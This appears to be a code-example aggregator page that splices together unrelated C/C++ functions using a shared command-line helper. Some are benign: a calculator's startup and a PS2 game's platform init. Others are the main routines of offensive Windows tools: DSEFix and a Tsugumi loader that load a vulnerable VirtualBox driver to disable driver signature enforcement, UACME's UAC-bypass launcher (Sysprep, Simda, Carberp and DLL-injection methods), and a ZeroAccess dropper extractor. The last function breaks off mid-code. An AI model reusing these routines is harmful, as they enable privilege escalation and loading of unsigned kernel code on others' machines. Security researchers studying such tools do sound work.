// ---------------------------------------------------------------------
BOOL WinCoveredCalcApp::initInstance()
{
	bool langFileLoaded = false;

	if (!base::initInstance())
	{
		return FALSE;
	}

	// コモンコントロール初期化
	::InitCommonControls();

	// レイヤードウィンドウ関連の API
	apiLayeredWindow.Initialize();
	
	// ウェイトカーソルを取得しておく
	waitCursor = ::LoadCursor(NULL, IDC_WAIT);

	// モニタ情報を取得しておく
	monitorInfo.Update();

	// ベースクラス初期化
	if (!init())
	{
		return FALSE;
	}

	// コマンドラインパラメータ解析
	CommandLineParam* clParam = GetCommandLineParam();
	clParam->SetParameter(__argc, __targv);

	// 言語ファイルの読み込み
	if (clParam->IsLangFileSpecified())
	{
		try
		{
			loadLangFile(clParam->GetLangFile());
			langFileLoaded = true;
		}
		catch (Exception* ex)
		{
			ex->Delete();

			// コマンドラインパラメータで指定された言語ファイルが読み込めなかったので無視します。
			DoMessageBox(NSID_EMSG_LOAD_COMMANDLINE_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
		}
	}

	// ウィンドウクラスの登録
	WinMainWindow::RegisterClass();

	//設定ファイルを準備
	Path settingFile;
	if (clParam->IsSettingFileSpecified())
	{
		// コマンドラインで設定ファイルが指定されていればそれを使う
		settingFile.Assign(clParam->GetSettingFile());
	}
	else
	{
		// デフォルト設定ファイルを使う
		try
		{
			readyDefaultSettingFilePath(settingFile);
		}
		catch (Exception* ex)
		{
			ExceptionMessageUtils::DoExceptionMessageBoxWithText(this, ex, NSID_EMSG_READY_DEFAULT_SETTING_FILE,
											MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
			ex->Delete();
			return FALSE;
		}
	}
	
	// 設定の読み込み
	try
	{
		loadSettings(settingFile);
	}
	catch (Exception* ex)
	{
		ex->Delete();
		return FALSE;
	}

	// 設定に保存された言語ファイルを読み込む
	if (!langFileLoaded)
	{
		AppSettings* appSettings = GetAppSettings();
		const Path settingPath = appSettings->GetLanguageFilePath();
		if (!settingPath.IsEmpty()) {
			Path langFileFullPath = MakeAbsoluteLangFilePath(settingPath);
			if (!langFileFullPath.IsEmpty())
			{
				try
				{
					loadLangFile(langFileFullPath);
					langFileLoaded = true;
				}
				catch (Exception* ex)
				{
					ex->Delete();

					// 設定ファイルに書かれた言語ファイルが読めません。
					DoMessageBox(NSID_EMSG_LOAD_SETTING_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
				}
			}
		}
	}
	
	if (!langFileLoaded)
	{
		// 設定に保存されていなければ、ユーザーに問い合わせる
		WinSelectLanguageDlg selectLangDlg;
		try
		{
			selectLangDlg.SetRelativeLangFilePath(Path(ALITERAL("enUS.cclxw")));
			int dlgResult = selectLangDlg.DoModal(NULL);
			if (IDOK != dlgResult)
			{
				return FALSE;
			}
		}
		catch (Exception* ex)
		{
			ExceptionMessageUtils::DoExceptionMessageBox(this, ex);
			ex->Delete();
			return FALSE;
		}

		Path langFilePath = selectLangDlg.GetRelativeLangFilePath();
		Path langFileFullPath = MakeAbsoluteLangFilePath(langFilePath);
		if (!langFileFullPath.IsEmpty())
		{
			try
			{
				loadLangFile(langFileFullPath);
				langFileLoaded = true;
				GetAppSettings()->SetLanguageFilePath(langFilePath);

			}
			catch (Exception* ex)
			{
				ex->Delete();

				// 言語ファイルが読めません。
				DoMessageBox(NSID_EMSG_LOAD_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
			}
		}
	}

	// キー定義名 DB のロード
	loadKeyNameDB();
	
	// キーマッピング読み込み
	loadKeyMappingsOnInit();
	
	// カバー読み込み
	try
	{
		AppSettings* appSettings = GetAppSettings();
		loadCoverDef(appSettings->GetBaseFolder(), appSettings->GetLastCoverDef(), appSettings->GetLastCoverNo());
	}
	catch (Exception* ex)
	{
		ExceptionMessageUtils::DoExceptionMessageBox(this, ex);
		ex->Delete();

		// デフォルトカバーで復活を試みる
		if (!restoreByDefaultCoverDef())
		{
			// ダメでした…。
			return FALSE;
		}
	}

	// メインウィンドウ生成
	DWORD exStyle = 0;
	if (GetAppSettings()->IsMainWindowAlwaysOnTop())
	{
		exStyle = WS_EX_TOPMOST;
	}
	const Point32& lastMainWindowPos = GetAppSettings()->GetLastMainWindowPos();
	if (!mainWindow.CreateEx(exStyle, WinMainWindow::GetWindowClassName(), ALITERAL("CoveredCalc"), WS_SYSMENU | WS_POPUP | WS_MINIMIZEBOX, lastMainWindowPos.x, lastMainWindowPos.y, 0, 0, NULL, NULL))
	{
		// デフォルトカバーにして再チャレンジ
		bool restored = false;
		if (restoreByDefaultCoverDef())
		{
			if (mainWindow.CreateEx(exStyle, WinMainWindow::GetWindowClassName(), ALITERAL("CoveredCalc"), WS_SYSMENU | WS_POPUP | WS_MINIMIZEBOX, lastMainWindowPos.x, lastMainWindowPos.y, 0, 0, NULL, NULL))
			{
				restored = true;
			}
		}
		
		if (!restored)
		{
			DoMessageBox(NSID_EMSG_CREATE_MAIN_WINDOW, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
			return FALSE;
		}
	}
	::ShowWindow(mainWindow.m_hWnd, SW_SHOW);

	// カバーブラウザ生成
	Path baseFolderPath = GetAppSettings()->GetBaseFolder();
	if (baseFolderPath.IsEmpty())
	{
		baseFolderPath = getAppFolderPath();
	}
	coverBrowser.SetCoversFolderPath(baseFolderPath.Append(ALITERAL("Covers")));
	if (!coverBrowser.Create(NULL))
	{
		DoMessageBox(NSID_EMSG_CREATE_COVER_BROWSER, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
	}

	::ShowWindow(mainWindow.m_hWnd, SW_SHOW);
	if (GetAppSettings()->IsCoverBrowserVisible())
	{
		::ShowWindow(coverBrowser.m_hWnd, SW_SHOW);
	}

	::SetForegroundWindow(mainWindow.m_hWnd);

	return TRUE;
}
示例#2
0
/*
* ldrMain
*
* Purpose:
*
* Program entry point.
*
*/
void ldrMain(
	VOID
	)
{
	BOOL	cond = FALSE;
	LONG	x;
	ULONG	l = 0, dwCmd;
	HANDLE	hDevice;
	PVOID	DataBuffer;
	BOOL	bConDisabled, bUsbMonDisabled;
	WCHAR	cmdLineParam[MAX_PATH + 1];
	WCHAR	szDriverBuffer[MAX_PATH * 2];

	__security_init_cookie();

	bConDisabled = FALSE;
	bUsbMonDisabled = FALSE;
	DataBuffer = NULL;
	hDevice = NULL;

	dwCmd = 0;
	do {

		//
		// Check OS version.
		//
		RtlSecureZeroMemory(&g_osv, sizeof(g_osv));
		g_osv.dwOSVersionInfoSize = sizeof(g_osv);
		RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv);

		//
		// We support only Vista based OS.
		//
		if (g_osv.dwMajorVersion < 6) {
			MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."),
				T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Check number of instances running.
		//
		x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
		if (x > 1) {
			break;
		}

		//
		// Check if any VBox instances are running, they must be closed before our usage.
		//
		if (supProcessExist(L"VirtualBox.exe")) {
			MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."),
				T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Query command line.
		//
		RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
		GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l);
		if (l == 0) {
			//
			// Nothing in command line, simple display help and leave.
			//
			MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Check known command.
		//
		if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) {
			dwCmd = TSMI_INSTALL;
		}
		else {
			if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) {
				dwCmd = TSMI_REMOVE;
			}
		}
		if (dwCmd == 0) {
			MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Init ldr and DSEFix.
		//
		if (!ldrInit(dwCmd)) {
			break;
		}

		//
		// Process command.
		//
		switch (dwCmd) {
			
			case TSMI_INSTALL:

				// Backup vboxdrv if exists.
				supBackupVBoxDrv(FALSE);

				// Stop VBox Networking and USB driver.
				bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE)));
				bUsbMonDisabled = dsfStopDriver(VBoxUsbMon);
				dsfStopDriver(VBoxDrvSvc);

				// Load vulnerable VBoxDrv, disable VBox Network if exist.
				RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
				if (GetSystemDirectory(szDriverBuffer, MAX_PATH) == 0) {
					MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."),
						NULL, MB_ICONINFORMATION);
					break;
				}
				_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));
				hDevice = dsfLoadVulnerableDriver(szDriverBuffer);
				if (hDevice) {

					//
					// Disable DSE so we can load monitor.
					// Device handle closed by DSEFix routine.
					//
					if (ldrPatchDSE(hDevice, TRUE)) {

						// Stop our VBoxDrv, need reloading for 2nd usage.
						dsfStopDriver(VBoxDrvSvc);

						// Load custom patch table, if present.
						RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
						GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l);
						if (l > 0) {
							l = 0;
							DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l);
							if ((DataBuffer != NULL) && (l > 0)) {
								g_TsmiPatchDataValue = DataBuffer;
								g_TsmiPatchDataValueSize = l;
							}
						}

						// Install and run monitor.
						if (!ldrSetMonitor()) {
							MessageBox(GetDesktopWindow(),
								TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR);
						}

						// Enable DSE back.
						hDevice = NULL;
						if (dsfStartDriver(VBoxDrvSvc, &hDevice)) {
							ldrPatchDSE(hDevice, FALSE);
						}

					}
					else { //ldrPatchDSE failure case

						// Unknown error during DSE disabling attempt.
						MessageBox(GetDesktopWindow(),
							TEXT("Error disabling DSE"), NULL, MB_ICONERROR);
					}

					// Finally, remove our vboxdrv file and restore backup.
					dsfStopDriver(VBoxDrvSvc);
					DeleteFile(szDriverBuffer);
					supBackupVBoxDrv(TRUE);

					// Restart installed VBoxDrv.
					dsfStartDriver(VBoxDrvSvc, NULL);

				}
				else { //dsfLoadVulnerableDriver failure case.

					// Load error, show error message and restore backup.
					supBackupVBoxDrv(TRUE);
					MessageBox(GetDesktopWindow(),
						TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR);
				}	
				break;
				
			//
			// Remove command, unload our driver and purge file/memory list cache.
			//
			case TSMI_REMOVE:
				scmUnloadDeviceDriver(TsmiDrvName);
				supPurgeSystemCache();
				break;

		}

	} while (cond);

	//
	// Cleanup after install.
	//
	if (dwCmd == TSMI_INSTALL) {

		// Re-enable VBox Network, UsbMonitor if they're disabled.
		if (bConDisabled) {
			supNetworkConnectionEnable(VBoxNetConnect, TRUE);
		}
		if (bUsbMonDisabled) {
			dsfStartDriver(VBoxUsbMon, NULL);
		}

		// Free memory allocated for custom patch table.
		if (DataBuffer != NULL) {
			HeapFree(GetProcessHeap(), 0, DataBuffer);
		}
	}

	InterlockedDecrement((PLONG)&g_lApplicationInstances);
	ExitProcess(0);
	return;
}
示例#3
0
文件: p_config.cpp 项目: basecq/thug
void Plat_Init(sint argc, char** argv)
{
	gHardware=HARDWARE_UNDEFINED;
	gGotExtraMemory=false;
	gCD=false;


	
	// must check to see if the supplied filename starts "cdrom0:\THPS4\"    SLUS_207.31;1

	// if the first real argument exists and starts with a digit, then assume
	// that we are running from a bootstrap (as we will just have been passed the language in argv[1])
	// and preempt any other parameters...
	// so assume running on a regular PS2, from the CD
	if (argc > 1)
	{
		if (argv[1][0] >= '0' && argv[1][0] <= '9')
		{
			printf ("argv[1][0] is a digit, so assuming bootstrap format, using \\thps4 directory\n");
			gBootstrap=true;
			gSonyBootstrap = true;
			gHardware=HARDWARE_PS2;
			gGotExtraMemory=false;
			gCD=true;

			// the rest we could, in theory, set from the sceLibDemo calls......			
			gLanguage=LANGUAGE_ENGLISH;
			gTerritory=TERRITORY_UNDEFINED;
			gDisplayType=DISPLAY_TYPE_NTSC;
			gFPS=60;

			
			return;
		}
		else
		{
			printf ("argv[1][0] (%s) is not digit, so it's a regular boot, using root\n",argv[1]);
		}
	}
	else
	{
		printf ("no arguments, so it's a regular boot, using root\n");
	}
	

	
	// If the filename ends in .elf, then extract out the name
	// c:\skate5\build\NGPSgnu\local.elf
	if (stricmp(argv[0]+strlen(argv[0])-4,".elf")==0)
	{
		char *p = argv[0]+strlen(argv[0])-5;		// letter before the .elf
		while (*p != '\\') p--;
		p++; // first letter of the name
		char *q = &s_elf_name[0];
		while (*p != '.') *q++ = *p++;
		*q++ = 0;
	}
	

	if (!argv[0] || stricmp(argv[0]+strlen(argv[0])-4,".elf")==0)
	{
		gHardware=HARDWARE_PS2_DEVSYSTEM;
		gGotExtraMemory=true;
		gCD=false;
	}
	else
	{
		// It's just a normal PS2
		gHardware=HARDWARE_PS2;
		gGotExtraMemory=false;
		gCD=true;
	}
	
	// Check command line to see if they're using ProView
	if (snputs("Plat_Init detected ProView ...\n")!=-1)
	{
		gHardware=HARDWARE_PS2_PROVIEW;
		gGotExtraMemory=false;
		gCD=false;
	}
	
	// Check command line to see if they want to force gGotExtraMemory on or off
	if (CommandLineContainsFlag("GotExtraMemory",argc,argv))		
	{
		gGotExtraMemory=true;
	}
	if (CommandLineContainsFlag("NoExtraMemory",argc,argv))		
	{
		gGotExtraMemory=false;
	}
	
	// Detect the language from the product code.
	gLanguage=LANGUAGE_ENGLISH;
	gpMemCardHeader=NGPS_NTSC;
	if (argv[0])
	{
		// Doing a stricmp just in case it changes to be CDROM later or something.
		if (stricmp(argv[0],sGenerateElfName(NGPS_NTSC))==0)
		{
			gLanguage=LANGUAGE_ENGLISH;
			gpMemCardHeader=NGPS_NTSC;
		}
		else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_ENGLISH))==0)
		{
			gLanguage=LANGUAGE_ENGLISH;
			gpMemCardHeader=NGPS_PAL_ENGLISH;
		}
		else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_FRENCH))==0)
		{
			gLanguage=LANGUAGE_FRENCH;
			gpMemCardHeader=NGPS_PAL_FRENCH;
		}
		else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_GERMAN))==0)
		{
			gLanguage=LANGUAGE_GERMAN;
			gpMemCardHeader=NGPS_PAL_GERMAN;
		}
		else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_ITALIAN))==0)
		{
			gLanguage=LANGUAGE_ITALIAN;
			gpMemCardHeader=NGPS_PAL_ITALIAN;
		}
		else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_SPANISH))==0)
		{
			gLanguage=LANGUAGE_SPANISH;
			gpMemCardHeader=NGPS_PAL_SPANISH;
		}
	}	

	// They may want to force the language to be something else from the command line ...
	const char *p_language=GetCommandLineParam("Language",argc,argv);
	if (p_language)
	{
		if (stricmp(p_language,"English")==0)
		{
			gLanguage=LANGUAGE_ENGLISH;
			gpMemCardHeader=NGPS_NTSC;
		}
		else if (stricmp(p_language,"French")==0)
		{
			gLanguage=LANGUAGE_FRENCH;
			gpMemCardHeader=NGPS_PAL_FRENCH;
		}
		else if (stricmp(p_language,"German")==0)
		{
			gLanguage=LANGUAGE_GERMAN;
			gpMemCardHeader=NGPS_PAL_GERMAN;
		}
		else if (stricmp(p_language,"Italian")==0)
		{
			gLanguage=LANGUAGE_ITALIAN;
			gpMemCardHeader=NGPS_PAL_ITALIAN;
		}
		else if (stricmp(p_language,"Spanish")==0)
		{
			gLanguage=LANGUAGE_SPANISH;
			gpMemCardHeader=NGPS_PAL_SPANISH;
		}
		else
		{
			Dbg_MsgAssert(0,("Language '%s' not supported",p_language));
		}
	}


	
	gTerritory=TERRITORY_UNDEFINED;

	gDisplayType=DISPLAY_TYPE_NTSC;
	gFPS=60;
	
	// Figure out if it is PAL from the product code ...
	if (argv[0])
	{
		char p_temp[50];
		strncpy(p_temp,argv[0],12);
		p_temp[12]=0; // strncpy won't terminate
		// Doing a stricmp just in case it changes to be CDROM later or something.
		if (stricmp(p_temp,"cdrom0:\\SLES")==0)
		{
			gDisplayType=DISPLAY_TYPE_PAL;
			gFPS=50;
		}	
	}
}
示例#4
0
文件: main.c 项目: AlphaPo325/DSEFix
void main()
{
	LONG x;
	ULONG ParamLen;
	HANDLE hDevice = NULL;
	WCHAR cmdLineParam[MAX_PATH + 1];
	BOOL bDisable = TRUE, cond = FALSE;

	__security_init_cookie();

	//
	// Output DSEFix banner.
	//
	ShowServiceMessage("DSEFix v1.1.0 started");
	ShowServiceMessage("(c) 2014 - 2015 DSEFix Project");
	ShowServiceMessage("Supported x64 OS : Vista / 7 / 8 / 8.1 / 10");

	do {

		//
		// Check single instance.
		//
		x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
		if (x > 1) {
			ShowServiceMessage("Another instance running, close it before");
			break;
		}

		//
		// Check supported OS.
		//
		RtlSecureZeroMemory(&osv, sizeof(osv));
		osv.dwOSVersionInfoSize = sizeof(osv);
		RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
		if (osv.dwMajorVersion < 6) {
			ShowServiceMessage("Unsupported OS");
			break;
		}

		//
		// Query command line parameters.
		//
		ParamLen = 0;
		RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
		GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &ParamLen);
		if (_strcmpi(cmdLineParam, TEXT("-e")) == 0) {
			ShowServiceMessage("DSE will be (re)enabled");
			bDisable = FALSE;
		}
		else {
			ShowServiceMessage("DSE will be disabled");
			bDisable = TRUE;
		}

		//
		// Load vulnerable driver and open it device.
		//
		hDevice = LoadVulnerableDriver();
		if (hDevice == NULL) {
			ShowServiceMessage("Failed to load vulnerable driver");
			break;
		}
		else {
			ShowServiceMessage("Vulnerable VirtualBox driver loaded");
		}

		//
		// Manipulate kernel variable.
		//
		if (DoWork(hDevice, bDisable)) {
			ShowServiceMessage("Kernel memory patched");
		}
		else {
			ShowServiceMessage("Failed to patch kernel memory");
		}

		//
		// Do basic cleanup.
		//
		ShowServiceMessage("Cleaning up");
		UnloadVulnerableDriver();

		ShowServiceMessage("Finish");

	} while (cond);

	InterlockedDecrement((PLONG)&g_lApplicationInstances);
	ExitProcess(0);
}
示例#5
0
/*
* SfExtractDropper
*
* Purpose:
*
* Extract Sirefef/ZeroAccess from image resource.
*
* CNG variant
*
*/
UINT SfExtractDropper(
	LPWSTR lpCommandLine
	)
{
	BOOL                  cond = FALSE, bSuccess = FALSE;
	ULONG                 c, uKey = 0, imagesz;
	WCHAR                 szInputFile[MAX_PATH + 1];
	WCHAR                 szOutputFile[MAX_PATH + 1];
	WCHAR                 szKey[MAX_PATH];
	PVOID                 ImageBase = NULL, EncryptedData = NULL, DecryptedData = NULL;
	IStream              *pImageStream = NULL;
	ULONG_PTR             gdiplusToken = 0;
	GdiplusStartupInput   input;
	GdiplusStartupOutput  output;
	PVOID                 BitmapPtr = NULL;
	GdiPlusBitmapData     BitmapData;
	GdiPlusRect           rect;
	SIZE_T                sz;
	PULONG                ptr, i_ptr;
	
	//input file
	c = 0;
	RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
	GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
	if (c == 0) {
		SfcuiPrintText(g_ConOut,
			T_SFEXTRACTUSAGE,
			g_ConsoleOutput, FALSE);
		return (UINT)-1;
	}

	//output file
	c = 0;
	RtlSecureZeroMemory(&szOutputFile, sizeof(szOutputFile));
	GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szOutputFile, MAX_PATH, &c);
	if (c == 0) {
		_strcpy(szOutputFile, TEXT("extracted.bin"));
	}

	//key
	c = 0;
	RtlSecureZeroMemory(&szKey, sizeof(szKey));
	GetCommandLineParam(lpCommandLine, 3, (LPWSTR)&szKey, MAX_PATH, &c);
	if ((c == 0) || (c > 10)) {
		SfcuiPrintText(g_ConOut,
			T_SFEXTRACTUSAGE,
			g_ConsoleOutput, FALSE);
		return (UINT)-1;
	}

	c = 0;
	if (locase_w(szKey[1]) == 'x') {
		c = 2;
	} 
	uKey = hextoul(&szKey[c]);

	do {

		ImageBase = SfuCreateFileMappingNoExec(szInputFile);
		if (ImageBase == NULL)
			break;

		c = 0;
		EncryptedData = SfLdrQueryResourceData(1, ImageBase, &c);
		if ((EncryptedData == NULL) || (c == 0))
			break;

		pImageStream = SHCreateMemStream((BYTE *)EncryptedData, (UINT)c);
		if (pImageStream == NULL)
			break;

		RtlSecureZeroMemory(&input, sizeof(input));
		RtlSecureZeroMemory(&output, sizeof(output));
		input.GdiplusVersion = 1;

		if (GdiplusStartup(&gdiplusToken, &input, &output) != GdiplusOk)
			break;

		BitmapPtr = NULL;
		if (GdipCreateBitmapFromStream(pImageStream, &BitmapPtr) != GdiplusOk)
			break;

		RtlSecureZeroMemory(&rect, sizeof(rect));
		
		if (
			(GdipGetImageWidth(BitmapPtr, (UINT *)&rect.Width) == GdiplusOk) &&
			(GdipGetImageHeight(BitmapPtr, (UINT *)&rect.Height) == GdiplusOk)
			)
		{
			RtlSecureZeroMemory(&BitmapData, sizeof(BitmapData));
			if (GdipBitmapLockBits(BitmapPtr, &rect, ImageLockModeRead, PixelFormat32bppARGB, &BitmapData) == GdiplusOk) {

				c = (rect.Width * rect.Height);
				
				imagesz = sizeof(ULONG) * c;
				sz = imagesz;
				DecryptedData = NULL;
				NtAllocateVirtualMemory(NtCurrentProcess(), &DecryptedData, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
				if (DecryptedData) {
					
					i_ptr = (PULONG)BitmapData.Scan0;
					ptr = DecryptedData;				
					while (c > 0) {
						*ptr = *i_ptr ^ uKey;
						ptr++;
						i_ptr++;
						c--;
					}

					bSuccess = (SfuWriteBufferToFile(szOutputFile, DecryptedData, imagesz, FALSE, FALSE) == imagesz);

					sz = 0;
					NtFreeVirtualMemory(NtCurrentProcess(), &DecryptedData, &sz, MEM_RELEASE);
				}
				GdipBitmapUnlockBits(BitmapPtr, &BitmapData);
			}
		}

	} while (cond);

	if (bSuccess == FALSE) {
		SfcuiPrintText(g_ConOut,
			T_SFEXTRACTFAIL,
			g_ConsoleOutput, FALSE);
	}
	else
	{
		SfcuiPrintText(g_ConOut,
			szOutputFile,
			g_ConsoleOutput, TRUE);
		SfcuiPrintText(g_ConOut,
			T_SFEXTRACTED,
			g_ConsoleOutput, TRUE);
	}

	if (BitmapPtr != NULL) {
		GdipDisposeImage(&BitmapPtr);
	}

	if (gdiplusToken != 0) {
		GdiplusShutdown(gdiplusToken);
	}

	if (pImageStream != NULL) {
		pImageStream->lpVtbl->Release(pImageStream);
	}

	if (ImageBase != NULL) {
		NtUnmapViewOfSection(NtCurrentProcess(), ImageBase);
	}
	return 0;
}
示例#6
0
文件: main.c 项目: 1ookup/UACME
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					bytesIO, dwType;
	WCHAR					szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType;
	RTL_OSVERSIONINFOW		osver;


	//verify system version
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {

		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);

		goto Done;
	}

	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}


	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
		if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
			dwType = METHOD_SYSPREP;
		}
		if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
			dwType = METHOD_SYSPREP_EX;
		}
		if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
			dwType = METHOD_OOBE;
		}
#ifndef _WIN64
		if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
			OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
			dwType = METHOD_APPCOMPAT;
		}
#endif
		if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
			dwType = METHOD_SIMDA;
		}
		if (lstrcmpi(szBuffer, TEXT("6")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r"));
			dwType = METHOD_CARBERP;
		}
		if (lstrcmpi(szBuffer, TEXT("7")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r"));
			dwType = METHOD_CARBERP_EX;
		}
	}

	if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
		MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  There is no RedirectEXE for x64.
//
#ifndef _WIN64
	case METHOD_APPCOMPAT:
		if (ucmAppcompatElevation()) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		if (dwType == METHOD_CARBERP) {

			if (osver.dwBuildNumber > 9600) {
				MessageBoxW(GetDesktopWindow(),
					TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}

			//there is no migmiz in syswow64 in 8+
			if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
				MessageBoxW(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
		}

		if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;
	}

Done:
	ExitProcess(0);
}
示例#7
0
文件: main.c 项目: rkornmeyer/UACME
/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
*/
UINT ucmMain()
{
	DWORD                   bytesIO, dwType, paramLen;
	WCHAR                   *p;
	WCHAR                   szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE    ElevType;


	if (ucmInit() != ERROR_SUCCESS) {
		return ERROR_INTERNAL_ERROR;
	}

	//query windows version
	if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) {
		ucmShowMessage(TEXT("This Windows is unsupported."));
		return ERROR_NOT_SUPPORTED;
	}

	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		return ERROR_INVALID_ACCESS;
	}

	if (ElevType != TokenElevationTypeLimited) {
		ucmShowMessage(TEXT("Admin account with limited token required."));
		return ERROR_NOT_SUPPORTED;
	}

	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
	if (bytesIO == 0) {
		return ERROR_INVALID_DATA;
	}
	
	dwType = strtoul(szBuffer);
	switch (dwType) {

	case METHOD_SYSPREP1://cryptbase
		if (g_ldp.osver.dwBuildNumber > 9200) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_SYSPREP2://shcore
		if (g_ldp.osver.dwBuildNumber != 9600) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_SYSPREP3://dbgcore
		if (g_ldp.osver.dwBuildNumber != 10240)	{
